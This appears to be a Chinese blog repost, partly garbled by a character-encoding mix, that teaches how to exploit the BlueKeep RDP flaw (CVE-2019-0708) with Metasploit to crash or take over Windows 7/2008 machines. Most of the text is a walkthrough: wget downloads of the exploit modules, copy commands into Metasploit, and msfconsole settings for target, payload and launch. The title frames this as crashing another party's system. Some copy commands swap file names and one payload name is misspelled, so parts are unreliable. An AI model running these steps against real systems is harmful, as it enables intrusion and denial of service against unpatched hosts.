vmware 蓝屏_网络安全小百科--利用微软CVE 2019-0708漏洞让对方系统蓝屏死机
漏洞背景:
Windows 系列服務(wù)器于 2019 年 5 月 15 號(hào),被爆出高危漏洞,該服務(wù)器漏洞利用方式是通過(guò)遠(yuǎn)程桌面端口3389進(jìn)行攻擊的。這個(gè)漏洞是今年來(lái)說(shuō)危害嚴(yán)重性最大的漏洞,跟之前的永恒之藍(lán)病毒差不多。
2019年9月7日晚上凌晨 1 點(diǎn)左右,metaspolit 官方更新了漏洞利用程序。
漏洞危害:
CVE-2019-0708 漏洞是通過(guò)檢查用戶的身份認(rèn)證,導(dǎo)致可以繞過(guò)認(rèn)證,不用任何的交互,直接通過(guò) rdp 協(xié)議進(jìn)行連接發(fā)送惡意代碼執(zhí)行命令到服務(wù)器中去。如果被攻擊者利用,會(huì)導(dǎo)致服務(wù)器被黑客入侵、感染病毒,像WannaCry永恒之藍(lán)一樣大規(guī)模的感染。
漏洞影響范圍:
該漏洞影響范圍較廣,Windows7 SP1、windows2003、windows2008和08 R2、windows xp 系統(tǒng)都會(huì)遭到攻擊。
漏洞復(fù)現(xiàn)環(huán)境準(zhǔn)備:
CVE 2019-0708的exploit地址:
https://github.com/rapid7/metasploit-framework/pull/12283?from=timeline&isappinstalled=0ruby腳本地址:
https://github.com/rapid7/metasploit-framework/pull/12283/fileswget下載:
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rbwget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rbwget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rbwget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb復(fù)制到KALl MSF中
rdp.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep.rb
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp_scanner.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/cve_2019_0708_bluekeep_rce.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/開(kāi)始復(fù)現(xiàn):
攻擊命令
使用msfconsole
進(jìn)入后使用reload_all重新加載模塊
使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
使用info查看工具相關(guān)信息以及設(shè)置
set RHOSTS 設(shè)置IP
set RPORT 設(shè)置RDP端口號(hào)
使用set target ID設(shè)置受害機(jī)機(jī)器
使用payload設(shè)置攻擊載荷
使用exploit開(kāi)始攻擊,等待建立連接
Step1.打開(kāi)kali,下載4個(gè)模塊
Step2. 復(fù)制到MSF文件中
如果出現(xiàn)無(wú)法找到rdp目錄,用mkdir創(chuàng)建一個(gè)目錄,運(yùn)行文章上的4個(gè)復(fù)制命令到msf文件夾中。
Step3.運(yùn)行msfconsole,重新加載模塊,use連接模塊
輸入”msfconsole”啟動(dòng)msf,然后輸入” reload_all”重新加載模塊進(jìn)入msf后,輸入search 0708 搜索攻擊模塊。(小技巧:直接use 編號(hào) 就能連接)
連接編號(hào)為3的攻擊模塊cve_2019_0708_bluekeep_rce
命令:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce當(dāng)連接攻擊模塊后查看攻擊設(shè)置命令: show options
RHOSTS=目標(biāo)
RPORT=端口
Target: 目標(biāo)版本對(duì)應(yīng)的id
提示:
Target 1 =Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
Target2= Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
Target3=Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
Target4= Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
設(shè)置目標(biāo)ip:set RHOSTS 192.168.1.192(測(cè)試機(jī)器ip 目標(biāo)為:win7)
設(shè)置攻擊版本: set target 3 (目標(biāo)機(jī)器在vm上測(cè)試的)
重要一點(diǎn):set payload windows/x64/shell_bitcp設(shè)置攻擊載荷(不設(shè)置情況可能攻擊失敗)
設(shè)置好目標(biāo)ip以及targer運(yùn)行:exploit 開(kāi)始攻擊
經(jīng)過(guò)測(cè)試發(fā)現(xiàn)會(huì)導(dǎo)致大部分機(jī)器藍(lán)屏,因?yàn)榘l(fā)布的exp為閹割版,所以大家請(qǐng)謹(jǐn)慎測(cè)試。
修復(fù)方案
1、最簡(jiǎn)便的方法就是安裝一個(gè)安全管家,比如火絨、360之類(lèi)的
2、把系統(tǒng)的自動(dòng)更新打開(kāi)或者到微軟官網(wǎng)下載補(bǔ)丁
3、設(shè)置防火墻規(guī)則,并關(guān)閉3389端口
總結(jié)
以上是生活随笔為你收集整理的vmware 蓝屏_网络安全小百科--利用微软CVE 2019-0708漏洞让对方系统蓝屏死机的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: +1和++的不同
- 下一篇: java信息管理系统总结_java实现科